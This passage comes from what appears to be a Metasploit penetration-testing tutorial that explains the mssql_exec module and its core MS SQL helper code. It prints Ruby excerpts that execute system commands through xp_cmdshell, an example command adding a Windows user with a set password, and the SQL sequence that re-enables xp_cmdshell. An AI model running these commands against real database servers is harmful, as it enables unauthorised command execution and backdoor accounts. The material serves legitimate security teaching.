Now we’ll examine what is actually occurring “under the hood” of the module we just worked with, mssql_exec. This allows us to get a feel for how existing code is operating before we write our own. Let’s open the module with a text editor to see how it operates:
root@bt:/opt/framework3/msf3# nano modules/auxiliary/admin/mssql/mssql_exec.rb
The following lines excerpted from the module yield a few important things worthy of note:
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL def run
mssql_xpcmdshell(datastore['CMD'], true) if mssql_login_datastore end
The first line at tells us that this module will include all functionality from Metasploit’s core libraries. Next the class is set at with code that defines this as an auxiliary module that inherits certain characteristics of, for example, scanners, denial-of-service vectors, data retrieval, brute force attacks, and reconnaissance attempts.
The include statement at is probably one of the most important lines, because it pulls in the MS SQL module from the core Metasploit libraries. Essentially, the MS SQL module handles all MS SQL–based communications and anything related to MS SQL. Finally, at it pulls a specific command from the Metasploit datastore.
Let’s examine the MS SQL function in the Metasploit core libraries to get a better understanding of its power. First, open mssql.rb and then mssql_commands.rb with the following commands, each in a different window:
root@bt:/opt/framework3/msf3#nano lib/msf/core/exploit/mssql.rbroot@bt:/opt/framework3/msf3#nano lib/msf/core/exploit/mssql_commands.rb
Press ctrl-W in Nano to search for mssql_xpcmdshell in mssql.rb, and you should find the definition that tells Metasploit how to use the xp_cmdshell procedure, as shown next:
#
# Execute a system command via xp_cmdshell
#
def mssql_xpcmdshell(cmd,doprint=false,opts={})
force_enable = false
begin
res = mssql_query("EXEC master..xp_cmdshell
'#{cmd}'", false, opts)This listing defines the SQL query to be run against the server as a call to the xp_cmdshell stored procedure at and a variable that will be replaced with the command line the user requests to be executed at . For instance, an attempt to add a user to the system would execute within MS SQL as EXEC master..xp_cmdshell 'net user metasploit p@55w0rd! /ADD' by setting the cmd variable to 'net user metasploit p@55w0rd! /ADD'.
Now turn your attention to the mssql_commands.rb, where the commands to enable the xp_cmdshell procedure live:
# Re-enable the xp_cmdshell stored procedure in 2005 and 2008
def mssql_xpcmdshell_enable(opts={});
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec
master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"Here you can see the sequence of commands issued to re-enable the xp_cmdshell stored procedure in MS SQL Server 2005 and 2008.
Now that you understand the functions we will be using in creating our own module, let’s get started.